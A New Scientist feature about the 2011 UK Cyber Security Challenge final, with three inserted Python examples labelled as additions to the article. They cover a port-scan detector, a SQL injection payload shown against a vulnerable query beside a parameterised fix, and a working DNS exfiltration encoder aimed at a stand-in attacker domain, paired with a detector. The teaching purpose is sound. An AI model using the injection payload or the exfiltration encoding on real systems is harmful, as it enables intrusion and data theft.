Who will protect your money, your identity and your secrets from hackers? New Scientist joins a bunch of hopefuls to find out if they're up to the task
5 March 2011, 10:59:59
Time remaining 00:50:00
In a quiet, windowless auditorium in Bristol, in the west of England, Lucy Robson and her team hunch over their laptops as the seconds on a giant clock above begin to count down. In a few moments, the enemy will begin the attack – but these villains won't be coming in through the doors.
Robson is competing in the finals of the UK Cyber Security Challenge, held at Hewlett-Packard Labs in Bristol. The participants, largely teenagers and amateur programmers, have been plucked from outside the cybersecurity industry. The hunt is on to find a new generation of people with the skills to battle the darkest elements of the online realm – the hackers who seize government secrets, anonymous activists bent on causing mayhem, and criminals stealing credit cards.
The industry needs fresh blood because the nature of the threat has changed. "Five to ten years ago, you'd be protecting against a clever kid who wants to deface a website," says Martin Sadler of HP Labs. That kind of unsophisticated attack was once relatively easy to thwart. But those days are over. Take the hackers who broke into the Sony PlayStation Network earlier this year. They breezed past the security measures of one of the world's biggest electronics companies to steal the names, addresses and possibly credit card numbers of over 100 million people. Sony had barely recovered when a different part of the company came under attack last week.
Hackers are no longer motivated by mischief alone but by big money. Cybercrime alone – including stolen credit card numbers and industrial espionage – now costs the UK £27 billion a year, according to the government's Office of Cyber Security and Information Assurance. The story is no different in other parts of the world.
At the same time, new forms of illegal online activism have grown up, with a collective called Anonymous at the vanguard, crippling websites and gleefully exposing secrets. "Anonymous is not a specific group that you can go and arrest," one of the competition judges explains. The label masks an ever-shifting informal membership who might be active for a year, or for 3 hours. "It's a bank manager who wants to be a bad guy for the day," he says. "You can't punch someone in the face on the street, but you can on the web."
While the diversity, motivation and acumen of the bad guys may have grown exponentially, the defenders are struggling to keep up. Pure technical acumen doesn't cut it any more. The current crop of cybersecurity professionals badly need to up their game. The Cyber Security Challenge, if not an act of desperation, is certainly one of necessity.
Last year about 4000 people entered the competition hoping to be crowned ultimate cybersecurity champion. Today, after a series of gruelling heats, only 30 remain. To the winners will go expensive training courses and internships. But the real beneficiaries might be the sponsors. They include security firm Sophos, defence contractor Qinetiq, and the UK government's Defence Science and Technology Laboratory, and they are treating this contest as a scouting operation.
Earlier, the contenders got their orders from the fake CEO and board members of a fake manufacturing firm called the Metal Box Company. Today's task, they were told, was to secure the firm's website and network. Then the finalists were split into teams with names like Enigma, Turing and Bombe.
They are about to start the first of the day's trials that will test their technical abilities, interpersonal skills and teamwork. Later on, judges will award two prizes: one to the winning team, the other to the best individual player. Entrants vying for the title include a professional actor, a geeky kid with hair down to his shoulders, a postman from northern England and, competing in Team Enigma, 17-year-old Robson, the contest's only girl.
Robson taught herself network security by reading Wikipedia and textbooks she bought with money she earned from a part-time supermarket job. "If it affects me, I want to know how it works," she says. She lives in Cromer, a small town on the east coast of England, with her dad, a carpet fitter, and her mum, a certified chartered accountant. "Make sure you get the 'certified chartered' bit, it's important," Robson instructs. She speaks as if she's processing every word before it emerges. Her cropped dark hair rests on the collar of a grey suit and a fashionable scarf. The other entrants wear T-shirts and jeans.
Robson entered the competition with two friends she met at a computer summer school. In the run-up to the finals, their team shone, sussing out well-disguised flaws in a home computer. "We got here because of Lucy," says her friend Stuart Rennie. "She was amazing." But today, Rennie has been placed on Team Bombe, competing against Robson.
It's 11 am, and the attack is about to start. The task is to identify and fend off waves of invaders who want to break into the Metal Box Company's computer network. The teams are clustered in one corner of the auditorium, isolated from each other by barriers. The wires trailing from their laptops disappear into a tangled clump under a nearby table, where the action is coordinated by the games masters, led by Andrew Laird of Bristol-based security firm Cassidian. The exercise is being staged on a Cassidian-built software simulator called Hotsim (for "Hands on Training Simulator"), which is robust enough to manage the cybersecurity training of the Brazilian and Finnish militaries. Hotsim reproduces all the day-to-day traffic you'd expect in a big company network, such as employees browsing the internet, instant messaging and exchanging emails, so the teams' laptop screens mirror what an IT security team in a real company would be looking at.
The competing teams monitor this virtual traffic for signs of intrusion, using standard programs: a network monitor that displays employee activity, an intrusion detection system that raises an alert when traffic looks suspicious, and a firewall to keep out threats. A skilful cyberdefender knows how to configure these tools to spot and block threats. If the contenders can successfully juggle all three, they can prevent the invasion.
Team Enigma, though, start badly. It's only a few minutes before the first sign of trouble: a "port scan" conducted by the enemy. Ports are the numbered doors into each machine on the network. Think of an arterial road system into a city that provides thousands of routes for different types of vehicles and destinations. Similarly, every computer on a network has some 65,000 numbered ports, and each service it offers listens on one of them. By convention, a web server accepts browser traffic on port 80 (or port 443 for encrypted connections), and email is handed between mail servers on port 25. An intruder will probe hundreds or thousands of these ports on a target to learn which services are listening, and so which might be out of date or misconfigured. That's what is happening now, but in their initial scramble to secure the perimeter neither Robson nor the rest of Team Enigma have noticed.
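An added example, not part of the original article and not code from Hotsim or the competition: the pattern a defender is looking for in a port scan is one source touching many different ports on a target in a short time. The Python below sifts a constructed connection log (timestamp, source, destination, destination port; the addresses and the scanning host 203.0.113.7 are invented) with a sliding time window and flags any source that hits at least a threshold of distinct ports within that window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed connection log, not Hotsim output:
# ISO timestamp, source IP, destination IP, destination port.
NORMAL = [
    "2011-03-05T11:03:01 10.0.0.23 192.168.1.10 80",
    "2011-03-05T11:03:02 10.0.0.23 192.168.1.10 443",
    "2011-03-05T11:03:05 10.0.0.41 192.168.1.10 25",
    "2011-03-05T11:03:40 10.0.0.41 192.168.1.10 80",
    "2011-03-05T11:03:44 10.0.0.23 192.168.1.10 80",
]
# A hypothetical scanner at 203.0.113.7 walks ports 20..40 in about four seconds.
SCAN = [
    f"2011-03-05T11:03:{10 + i // 6:02d} 203.0.113.7 192.168.1.10 {20 + i}"
    for i in range(21)
]
LOG = NORMAL + SCAN


def parse(lines):
    """Group (timestamp, destination port) pairs by source address."""
    events = defaultdict(list)
    for line in lines:
        ts, src, _dst, dport = line.split()
        events[src].append((datetime.fromisoformat(ts), int(dport)))
    return events


def port_scanners(lines, window=timedelta(seconds=10), threshold=15):
    """Flag any source that touches at least `threshold` distinct destination
    ports inside some interval of length `window`.

    Returns {source: most distinct ports seen in a single window}."""
    flagged = {}
    for src, evs in parse(lines).items():
        evs.sort()
        lo, best = 0, 0
        for hi in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            best = max(best, len({port for _, port in evs[lo:hi + 1]}))
        if best >= threshold:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    print(port_scanners(LOG))  # the scanner is the only source flagged
```

The obvious evasion is a slow scan: one port a minute never puts fifteen ports inside a ten-second window, which is why real intrusion detection systems keep much longer state per source and also watch for the tell-tale replies from closed ports, not just the outbound attempts.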
The person in charge of monitoring the traffic zipping around on the network router is Tony Shannon, a stocky, confident 28-year-old with a pierced eyebrow. After a few years in the IT industry, he's back studying computer security at Nottingham Trent University, UK. Shannon's style is nothing like Robson's. He has decided that the way to impress the judges is to mount ostentatious vocal displays. "Oh yeah, we're FUBAR," he declares, as things start to come unstuck. "We're folding like a cheap deckchair." And the team really is folding in the face of the attacks. For all his earlier bravado, Shannon hasn't found much to contribute so far. There's anxiety in his voice.
Time remaining 00:31:20
Twenty minutes in, and the Metal Box Company website has been hacked. The home page has been replaced by a simple message: "Pwned by /b", followed by a stream of Latin. When you're pwned, you're conquered, goes the web slang.
Team Enigma manages to restore the home page, but they are missing crucial information: if they can't figure out how the attackers got in, their fix is only temporary. Further investigation reveals that the hacker used an attack called SQL injection. SQL is the language websites use to ask a database for information. Many online retailers draw on such databases to update, in real time, the stock of products they display, as well as customer details. SQL automates the retrieval of that information and so makes web developers' lives easier. But if a website pastes what a visitor typed straight into its SQL, hackers can turn the database against the site to break in and steal information. Consider the forms you use to fill in your name, address and credit card details on a website: every one of these can potentially be a door to a website's inner sanctum.
Team Enigma suspect that the attacker entered via one of these forms, typing fragments of SQL into a field so that the website, instead of treating the text as a plain value, spliced it into its own query and changed what the query asked for. The shoddily built Metal Box Company website failed to keep the visitor's input separate from the query, so the hacker could make the database return rows it should never have shown. That's probably how the attacker stole the password that was then used to deface the website.
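An added example, not part of the original article and not the Metal Box Company's real code: the two ways of writing the same user lookup, side by side, against a constructed in-memory database. The vulnerable version builds the SQL by pasting the form field into the query text, so the classic payload `' OR '1'='1` turns a lookup for one user into a dump of every row, passwords included. The hardened version hands the value to the database separately from the query, and the same payload matches nothing. The table, users and passwords are invented, and passwords are stored in plain text only so the leak is visible; a real site would store salted hashes.

```python
import sqlite3

# Constructed sample data for a hypothetical user table. Plain-text passwords
# are used here purely to make the leak obvious in the output.
USERS = [
    ("alice", "s3cret-alice", "staff"),
    ("bob", "hunter2", "staff"),
    ("admin", "c0rrect-h0rse", "admin"),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def lookup_vulnerable(conn, username):
    """The shoddy version: the form field becomes part of the SQL text, so
    whatever the visitor types is parsed as SQL grammar, not as a value."""
    sql = f"SELECT username, password, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, username):
    """Parameterised version: the database receives the query shape and the
    value through separate channels, so the value can never alter the query."""
    sql = "SELECT username, password, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo():
    conn = build_db()
    payload = "' OR '1'='1"  # closes the quoted string, then appends a tautology
    # Vulnerable query as the database sees it after the payload is pasted in:
    #   ... WHERE username = '' OR '1'='1'
    return {
        "honest_vulnerable": lookup_vulnerable(conn, "alice"),
        "injected_vulnerable": lookup_vulnerable(conn, payload),
        "honest_hardened": lookup_hardened(conn, "alice"),
        "injected_hardened": lookup_hardened(conn, payload),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

Parameterised queries are the fix, not input filtering: a blacklist of quote characters is easily bypassed, whereas a bound parameter is never parsed as SQL at all. The same principle covers every form field on a site, since each one reaches the database by the same route.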
Time remaining 00:13:19
Things are getting serious. Until now, the attacks have been simple vandalism, but now the Metal Box hackers have set loose a particularly nasty piece of malware that hunts down passwords, financial statements and sensitive personal information. That kind of data can be embarrassingly easy for a malware program to find. An email or document with the word "confidential" at the top, says Laird, "is like a flag saying 'Hey, I'm interesting' ".
Its quarry identified, the malware is now chopping the documents into tiny segments and encrypting them. To sneak its swag out of the network unnoticed, the malware hides the fragments inside messages known as Domain Name System (DNS) queries. These queries leave the network any time someone connects to an outside server. When you visit, say, newscientist.com, your computer asks a DNS server to translate the text-based name "newscientist.com" into its real address, an IP address, which is a long and unmemorable string of numbers. The malware encodes each fragment into the name it asks about, for instance as a long, garbled-looking subdomain of a domain the attacker owns; the company's own DNS server dutifully forwards the question to the attacker's name server, which is all the attacker needs to receive it. Because DNS queries form a large part of normal traffic leaving an internal network, and because firewalls routinely let them through, the extra information rarely arouses suspicion. The malware can therefore idly transmit the encrypted segments inside thousands of outbound DNS queries, and once they are out, the attacker simply reassembles the pieces at the other end. This type of attack is called "DNS exfiltration".
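An added example, not part of the original article and not the malware or the tools used in Hotsim: both ends of the tunnel described above, plus the check a defender can run against a query log. The malware side cuts a constructed "confidential" document into 32-byte chunks and base32-encodes each into a subdomain of `cdn-telemetry.example`, an invented attacker-owned domain; the attacker side reassembles the original from the names that reach its name server. The defender side groups a constructed query log by domain and flags any domain that receives many distinct, long, never-repeating names, which is the signature a sea of legitimate lookups does not have. (Encryption of the fragments, which the article describes, is left out here so the encoding stays readable; it would not change the detection.)

```python
import base64
from collections import defaultdict

# Hypothetical attacker-controlled domain; queries for it end up at the
# attacker's authoritative name server. Constructed for this example.
EXFIL_DOMAIN = "cdn-telemetry.example"
CHUNK = 32  # bytes per query: 32 bytes -> 52 base32 chars, under the 63-char label limit

# Constructed "confidential" document the malware wants to steal.
SECRET = ("CONFIDENTIAL: Metal Box Company Q1 cash position and "
          "supplier payment terms. " * 12).encode()


def encode_queries(data, domain=EXFIL_DOMAIN):
    """Malware side: chop data into chunks and bury each in a query name.
    The sequence-number label lets the receiver reorder out-of-order queries."""
    names = []
    for seq, off in enumerate(range(0, len(data), CHUNK)):
        label = base64.b32encode(data[off:off + CHUNK]).decode().rstrip("=").lower()
        names.append(f"{label}.{seq}.{domain}")
    return names


def decode_queries(names):
    """Attacker side: what the name server for EXFIL_DOMAIN sees, reassembled."""
    pieces = {}
    for name in names:
        label, seq, _rest = name.split(".", 2)
        padded = label.upper() + "=" * (-len(label) % 8)  # restore base32 padding
        pieces[int(seq)] = base64.b32decode(padded)
    return b"".join(pieces[i] for i in sorted(pieces))


def suspicious_domains(qlog_lines, min_unique=20, min_label=30):
    """Defender side: per domain (last two labels), count distinct query names
    and the mean length of their longest label. Many distinct, long names under
    one domain is the tunnel's fingerprint; ordinary browsing repeats a handful."""
    seen = defaultdict(set)
    for line in qlog_lines:
        _ts, _client, qname = line.split()
        parent = ".".join(qname.rstrip(".").split(".")[-2:])
        seen[parent].add(qname)
    verdict = {}
    for parent, names in seen.items():
        longest = [max(len(label) for label in n.split(".")) for n in names]
        mean_label = sum(longest) / len(longest)
        if len(names) >= min_unique and mean_label >= min_label:
            verdict[parent] = {"unique_names": len(names),
                               "mean_longest_label": round(mean_label, 1)}
    return verdict


# Constructed query log (time, client, query name): normal browsing plus the tunnel.
NORMAL = [
    "11:41:02 10.0.0.23 www.newscientist.com",
    "11:41:05 10.0.0.23 newscientist.com",
    "11:41:09 10.0.0.41 mail.example.org",
    "11:41:12 10.0.0.41 calendar.example.org",
    "11:41:20 10.0.0.23 www.newscientist.com",
]
TUNNEL = [f"11:42:{i % 60:02d} 10.0.0.57 {name}"
          for i, name in enumerate(encode_queries(SECRET))]
QUERY_LOG = NORMAL + TUNNEL


def demo():
    return {
        "queries_sent": len(TUNNEL),
        "attacker_recovered_all": decode_queries(encode_queries(SECRET)) == SECRET,
        "flagged": suspicious_domains(QUERY_LOG),
    }


if __name__ == "__main__":
    print(demo())
```

The thresholds are deliberately crude. A patient attacker can stretch the same transfer over days and keep the per-domain count below any fixed limit, so in practice this check is paired with looking at which internal hosts are asking, how much they ask, and whether the domains they ask about were ever seen before; the same grouping by domain also tells the incident responders what actually left, which is the question Laird says the victims usually cannot answer.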
The US government estimates that data exfiltration has caused government departments and agency networks to lose more than 20 terabytes of data, but because the thieves encrypted what they stole, it's hard to tell what was lost. "They don't know what it is and they don't know where it's gone," says Laird. It's the perfect heist.
Team Enigma have failed to spot the breach, and the Metal Box Company is haemorrhaging data: over 2000 documents have left the network. Robson, who is normally calm, seems harassed, furiously logging details of the attacks, while the others try to track down what's happening. The airless room is claustrophobic with the shouts of the teams, and there's a smell of nervous sweat. By the time the team spot the DNS theft, it's too late.
Time remaining 00:02:58
The Hotsim attackers have barred all the company's employees from accessing their own user accounts, including the security team. If you have ever entered the wrong password three times in a row and been locked out of your account, you'll know how this works. This attack is usually a decoy for staging a more serious theft, but today it's more like a final taunt.
"Take your hands off your keyboards," says games master Laird. The teams lean back on their chairs. They look dazed. "My head hurts," says Robson. Shannon stares at the clock.
Robson, Shannon and the others have had their first taste of what the good guys are up against. All over the world, cybersecurity specialists are under siege. They don't know when the next attack will arrive, or why.
6 March 2011, 13:30:00
The organisers are about to announce the winners at the awards ceremony lunch, being held in a fancier venue in Bristol. It's a fresh, wintry Sunday, and the sunlight glints on the cutlery and glasses.
Team Enigma haven't won the overall prize. That went to Team Bombe, which included the competition winner, Dan Summers, the postman. But Team Enigma are in good spirits.
Up on stage, Robson accepts an award for her performance in the heats that brought her to the final competition, a coveted digital security internship with Qinetiq. Even Shannon is in a good mood, having won a training course. "I'll stop grinning sometime in my sleep tonight," he says. As the ceremony winds down inside the hall, Robson is outside, texting on her phone. Next year, she'll be studying computer science at university, or perhaps she'll take a gap year.
Meanwhile, someone, somewhere is plugging into the vast web of cables, processors and servers joined up around the planet. And they're up to no good.
Virtual crime, real world
It's 2020, and you are lost in an unfamiliar neighbourhood because you were trying to avoid congestion on the main roads. But you're not worried: you are being led to a clear stretch of road by your car's navigation system, which is chatting with billions of sensors embedded into the roads to avoid traffic snarls. But can you trust your satnav? If hackers can break into a website, they can also make short work of this network of sensors and cause mischief on a city-wide scale, misdirecting cars for kicks, perhaps down a side street where someone is waiting to rob you.
If the scenario seems unlikely, consider that billions of networked sensors will soon become embedded throughout our cities and possessions, generating a flood of information about you and your surroundings. Gigabytes of sensitive data will circulate through this "internet of things", a global network of interconnected and continually monitored objects.
"This world of sensors will create new problems," says Martin Sadler of Hewlett-Packard Labs in Bristol, UK. Clearly, it will need a completely different kind of custodian to protect it from falling into the wrong hands, he says. Time to start training the next generation of cyberdefenders.
Richard Fisher is a technology features editor at New Scientist